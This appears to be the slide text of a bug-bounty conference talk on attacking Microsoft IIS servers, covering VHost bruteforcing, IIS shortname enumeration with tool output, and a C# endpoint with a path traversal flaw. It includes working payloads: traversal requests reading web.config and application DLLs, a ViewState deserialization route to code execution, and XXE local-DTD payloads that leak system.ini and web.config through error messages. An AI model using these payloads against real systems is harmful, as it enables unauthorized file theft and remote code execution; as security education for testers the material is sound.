Hacking IIS - NahamCon.pdf

Dealing with HTTPAPI 2.0
Assets

Have you seen this before?
• Either, you’re missing the subdomain associated with the IP address (No SSL certificate)
• Or the subdomain doesn’t resolve but you can obtain a full/partial subdomain from the SSL
certificate

Resolving the HTTPAPI 2.0 404 Error
• This is super simple, but often people skip assets when they see the HTTPAPI
2.0 404 error. This error usually means that the asset needs the correct host
header to route to the application.
• You’re not always fortunate enough to have the full subdomain provided to
you via the SSL certificate.
• If you know the hostname, simply provide the hostname in the HTTP Host
header.
• Sometimes you have to bruteforce VHosts until you can access the
application.

After fixing the host header
• Add a line to your /etc/hosts file to map the correct host name to the IP
address of the asset.
• Run all of your scanning again, including your enumeration through IIS
shortname scanner.
• Perform VHost enumeration/bruteforcing to see if there are any other
applications that are present on the host.
• Find all other assets that respond with HTTPAPI 2.0 404 errors and apply the
same workflow (rinse and repeat).

Accessing an internal admin panel via VHost
Hopping ($1900)
• Came across an asset that looked something like apply.company.com
running IIS.
• Used a large subdomain wordlist to bruteforce VHosts using Burp Intruder
(%bruteforce%.company.com).
• Large and different response returned for mssql.company.com which was
not accessible externally, only accessible through “VHost Hopping”.
• This was running a MSSQL database manager/explorer (https://
sourceforge.net/projects/asp-ent-man/).

Accessing the VHost
• Often, on IIS servers, there may be internal applications running under a
different host name. Host name bruteforcing / VHost hopping is very
effective in IIS environments.
• A simple match and replace rule to facilitate the access:

Typical Local File Disclosure in C#
[Route("v1/DownloadCategoryExcel")]
public HttpResponseMessage DownloadCategoryExcel(string fileName)
{
string path = HttpContext.Current.Server.MapPath("~/Content/PDF/" + fileName);
HttpResponseMessage httpResponseMessage = new HttpResponseMessage(HttpStatusCode.OK);
FileStream fileStream = new FileStream(path, FileMode.Open);
httpResponseMessage.Content = (HttpContent) new StreamContent((Stream) fileStream);
httpResponseMessage.Content.Headers.ContentDisposition = new ContentDispositionHeaderValue("attachment");
httpResponseMessage.Content.Headers.ContentDisposition.FileName = Path.GetFileName(path);
httpResponseMessage.Content.Headers.ContentType = new MediaTypeHeaderValue("application/octet-stream");
httpResponseMessage.Content.Headers.ContentLength = new long?(fileStream.Length);
return httpResponseMessage;
}

Local file disclosure? web.config is your friend.
• Follow this resource: https://bit.ly/36D3WQg (From Path Traversal to Source
Code in Asp.NET MVC Applications - Minded Security)
• DownloadCategoryExcel?fileName=../../web.config
• DownloadCategoryExcel?fileName=../../global.asax
• <add namespace="Company.Web.Api.dll" / >
• DownloadCategoryExcel?fileName=../../bin/Company.Web.Api.dll
• Repeat for other namespaces if necessary.

ASP.NET Viewstate Deserialization
• Nominated for a pwnie award for “most under hyped research”
https://bit.ly/2MzJ1qI & white paper: https://bit.ly/2NDZc73
• For IIS webservers, if you can read the web.config file, you can almost always
get RCE.
• Obtain the machineKey variable from the web.config file (validationKey,
decryptionKey)
• https://github.com/0xacb/viewgen
• VIEWSTATE → ObjectStateFormatter (Insecure Deserialization) → RCE

Targeting Dependencies
• Let’s say you come across an endpoint like the following:
• /admin/cutesoft_client/cuteeditor/uploader.ashx
• Cutesoft Editor is available for download via http://cutesoft.net/downloads/
12/default.aspx.
• The ZIP file that can be downloaded from the above URL contains a number
of DLL files, but no source code.
• We can use DNSpy to analyse the source code and find vulnerabilities.

Source Code Analysis through DNSpy
• https://github.com/dnSpy/dnSpy/releases
• DNSpy is capable of reversing assemblies (i.e DLL files) back into source
code. Simply load the DLL file and export the source code project.

Constraints
• No outbound HTTP traffic. The only outbound traffic possible is DNS.
• Your external entity is not being displayed in the response anywhere.
• You cannot use an external DTD because you cannot reach your external
host via HTTP.
• Thankfully, stack traces are enabled.
• How do you exploit this XXE?
• XXE Payloads available here: https://bit.ly/3cF8pWs

Local DTDs (Attempt 1)
• https://bit.ly/2LjXoyM (Exploiting XXE with local DTD files)
<?xml version=”1.0″ ?>
<!DOCTYPE message [
<!ENTITY % local_dtd SYSTEM
"file:///C:/Windows/System32/wbem/xml/cim20.dtd">
<!ENTITY % SuperClass '>
<!ENTITY % file SYSTEM "file:///c:/windows/system.ini">
<!ENTITY % eval "<!ENTITY &#x25; error SYSTEM
'file:///nonexistent/%file;'>">
%eval;
%error;
'>
%local_dtd;
]>
<message>any text</message>
Local DTD
Local File
to Read
Side
Channel
Leak

Stack Trace But No Love
Error parsing request: System.Xml.XmlException: An error occurred while parsing EntityName. Line 37, position 46.
at System.Xml.XmlTextReaderImpl.Throw(Exception e)
at System.Xml.DtdParser.ScanEntityName()
at System.Xml.DtdParser.ScanLiteral(LiteralType literalType)
at System.Xml.DtdParser.ScanEntity2()
at System.Xml.DtdParser.ParseEntityDecl()
at System.Xml.DtdParser.ParseSubset()
at System.Xml.DtdParser.ParseInDocumentDtd(Boolean saveInternalSubset)
at System.Xml.DtdParser.Parse(Boolean saveInternalSubset)
at System.Xml.DtdParser.System.Xml.IDtdParser.ParseInternalDtd(IDtdParserAdapter adapter, Boolean saveInternalSubset)
at System.Xml.XmlTextReaderImpl.ParseDtd()
at System.Xml.XmlTextReaderImpl.ParseDoctypeDecl()
at System.Xml.XmlTextReaderImpl.ParseDocumentContent()
at System.Xml.XmlLoader.Load(XmlDocument doc, XmlReader reader, Boolean preserveWhitespace)
at System.Xml.XmlDocument.Load(XmlReader reader)
at System.Xml.XmlDocument.LoadXml(String xml)
No data, parsing error
😭

Local DTDs (Attempt 2)
• A huge thank you to Robert Vulpe on Twitter for this trick: @nytr0gen_
<?xml version=”1.0″ ?>
<!DOCTYPE doc [
<!ENTITY % local_dtd SYSTEM "file:///C:WindowsSystem32wbemxmlcim20.dtd">
<!ENTITY % SuperClass '>
<!ENTITY % file SYSTEM "file://D:webserv2servicesweb.config">
<!ENTITY % eval "<!ENTITY &#x25; error SYSTEM
'file://nonexistent/#%file;'>”>
%eval;
%error;
<!ENTITY test "test"'
>
%local_dtd;
]><xxx>cacat</xxx>
Added a # so that the
file entity is a part
of a fragment
identifier

🎉🎉🎉🎉 Fragment Identifier
Error
Partial File Contents

Partial Fuzzing w/ Short Names

Logical fuzzing of files and folders
• After running Shortname Enumeration on your target, you may end up with
output like so:
› go run cmd/shortscan/main.go http://redacted/
Shortscan v0.4 // an IIS short filename enumeration tool by bitquark
Target: http://redacted/
Running: Microsoft-IIS/8.5 (ASP.NET v4.0.30319)
Vulnerable: Yes!
--------------------------------------------------------------------------------
ASPNET~1 ASPNET? ASPNET_CLIENT
LIDSDI~1 LIDSDI?
LIDSSE~1 LIDSSE?
LIDSTE~1 LIDSTE?
EASYFI~1 EASYFI?
--------------------------------------------------------------------------------
Finished! Requests: 250; Retries: 0; Sent 48277 bytes; Received 105151 bytes

Logical fuzzing of files and folders
• Try and find the most logical cut off point.
• For example, for ffuf, you would put use the following fuzzing pattern:
• LIDSDI_____ → LIDSFUZZ
• LIDSSE_____ → LIDSFUZZ
• EASYFI_____ → EASYFUZZ
• ./ffuf -w final_wordlist.txt -D -e asp,aspx,ashx,asmx -t 1000 -c -u
http://redacted/lidsFUZZ

SSH: shubs@mothership ~/w/ffuf-brute $ ./ffuf -w final_fucking_wordlist.txt -D -e asp,html,aspx,ashx,asmx
-t 1000 -c -u http://redacted/lidsFUZZ
/'___ /'___ /'___
/ __/ / __/ __ __ / __/
,__ ,__/ / ,__
_/ _/ _ _/
_ _ ____/ _
/_/ /_/ /___/ /_/
v1.1.0
________________________________________________
:: Method : GET
:: URL : http://redacted/lidsFUZZ
:: Wordlist : FUZZ: final_fucking_wordlist.txt
:: Extensions : asp html aspx ashx asmx
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 1000
:: Matcher : Response status: 200,204,301,302,307,401,403
________________________________________________
test [Status: 301, Size: 154, Words: 9, Lines: 2]
TEST [Status: 301, Size: 154, Words: 9, Lines: 2]
Test [Status: 301, Size: 154, Words: 9, Lines: 2]
display [Status: 301, Size: 157, Words: 9, Lines: 2]
Display [Status: 301, Size: 157, Words: 9, Lines: 2]
Service [Status: 301, Size: 150, Words: 9, Lines: 2]
:: Progress: [700801/700801] :: Job [1/1] :: 4800 req/sec :: Duration: [0:02:26] :: Errors: 0 ::

• ./crunch 0 3 abcdefghijklmnopqrstuvwxyz0123456789 -o 3chars.txt
• https://bit.ly/3q2yFwY

More resources on hacking IIS
• https://bit.ly/3uzOP4N → Assetnote Youtube Channel
• https://youtu.be/HrJW6Y9kHC4 → Hacking IIS Part 1
• https://youtu.be/_4W0WXUatiw → Hacking IIS Part 2
• http://soroush.secproject.com/blog/ → My favourite blog on IIS hacking
• https://twitter.com/bitquark → Building an amazing IIS shortname scanner
• https://twitter.com/nytr0gen_ → Discovered the XXE technique for partial
leakage via fragment identifier errors

Hacking IIS - NahamCon.pdf

More Related Content

What's hot (20)

Similar to Hacking IIS - NahamCon.pdf (20)

Recently uploaded (20)

Hacking IIS - NahamCon.pdf